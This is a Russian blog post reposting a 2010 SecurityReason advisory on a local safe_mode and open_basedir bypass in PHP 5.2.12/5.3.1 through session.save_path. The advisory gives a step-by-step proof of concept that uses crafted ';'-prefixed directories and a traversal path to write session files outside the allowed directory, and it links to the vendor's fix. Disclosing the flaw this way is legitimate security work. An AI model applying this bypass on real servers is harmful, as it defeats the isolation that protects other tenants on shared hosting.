Свежая уязвимость интерпретатора, найденная Grzegorz Stachowiak опубликована тут:

http://securityreason.com/achievement_securityalert/82

Не очень представляю применимость такой штуки, но, думаю, на каждую уязвимость найдется по уязвимому проекту ;)

Вещь, конечно, не инновационная, техника классическая…

Описание далее Details : SecurityReason Advisory

Topic : PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
SecurityAlert : 82
CVE : CVE-GENERIC
SecurityRisk : Medium (About)
Remote Exploit : No
Local Exploit : Yes
Exploit Given : Yes
Credit : Grzegorz Stachowiak
Date : 11.02.2010
Affected Software : PHP 5.2.12/5.3.1

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Advisory Text :

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1

[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]

Credit: Grzegorz Stachowiak
Provided by: SecurityReason.com
Date:
- – Written: 31.01.2010
- – Public: 11.02.2010

SecurityRisk: Medium
Affected Software:
PHP 5.2.12
PHP 5.3.1

Advisory URL: http://securityreason.com/achievement_securityalert/82
Vendor: http://www.php.net

- — 0.Description —
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

A visitor accessing your web site is assigned a unique id, the so-called
session id. This is either stored in a cookie on the user side or is
propagated in the URL.

session.save_path defines the argument which is passed to the save handler.
If you choose the default files handler, this is the path where the files
are created. Defaults to /tmp. See also session_save_path().

There is an optional N argument to this directive that determines the
number of directory levels your session files will be spread around in. For
example, setting to ‘5;/tmp’ may end up creating a session file and
location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In
order to use N you must create all of these directories before use. A small
shell script exists in ext/session to do this, it’s called mod_files.sh.
Also note that if N is used and greater than 0 then automatic garbage
collection will not be performed, see a copy of php.ini for further
information. Also, if you use N, be sure to surround session.save_path in
“quotes” because the separator (;) is also used for comments in php.ini.

- —- 1. session.save_path safe mode and open basedir bypass —
session.save_path can be set via ini_set(), session_save_path() functions.
In session.save_path there should be path where you will save yours tmp
files. But syntax for session.save_path is:

[/PATH]

OR

[N;/PATH]

N – can be also a string (N should be numeric).

EXAMPLES:

1. session_save_path(“/DIR/WHERE/YOU/HAVE/ACCESS”)
2. session_save_path(“5;/DIR/WHERE/YOU/HAVE/ACCESS”)

The main problem came when we use multiple ‘;’ character and when we will
create fake directory structure to reduce ‘../’.

Proof of Concept:
0. Create directories:

/humhum

and

/byp

1. set open_basedir = /byp
2. create test.php
{
session_save_path(“/humhum”);
session_start();
}
3. php test.php

Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on
line 3
4. subdir.php
{
mkdir(“puf”);
mkdir(“;a”);
}
5. php subdir.php
6. cd puf
7. create byp.php
{

session_save_path(“;;/byp/;a/../../humhum”);
session_start();

}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn’t check, that we have
used next ‘;’ after first. Creating fake directory structure

mkdir ‘;a’
mkdir ‘../;a’

we can reduce directory level using ‘../’ .

- — 2. Fix —
Revision 294272

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.

c?view=log

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.

c?view=log

- — 3. Credit —
Founded by: Grzegorz Stachowiak
Written by: Maksymilian Arciemowicz
Fixed by : Ilia Alshanetsky

- — 4. Contact —
Email:
- – Grzegorz.Stachowiak
stachowiak [a,t} analogicode (d_0t} pl

- - Maksymilian Arciemowicz
cxib {a.t] securityreason [d0_t} com

GPG:

http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/

http://securityreason.com/exploit_alert/ – Exploit Database
http://securityreason.com/security_alert/ – Vulnerability Database
—–BEGIN PGP SIGNATURE—–

iEYEARECAAYFAktzFYIACgkQpiCeOKaYa9YoVQCg6WbLMX+kCUA0WDy9toYhRGrJ
10oAoMXbDGnFROtZ4rjw8iWfuSl+Loeb
=z0qD
—–END PGP SIGNATURE—–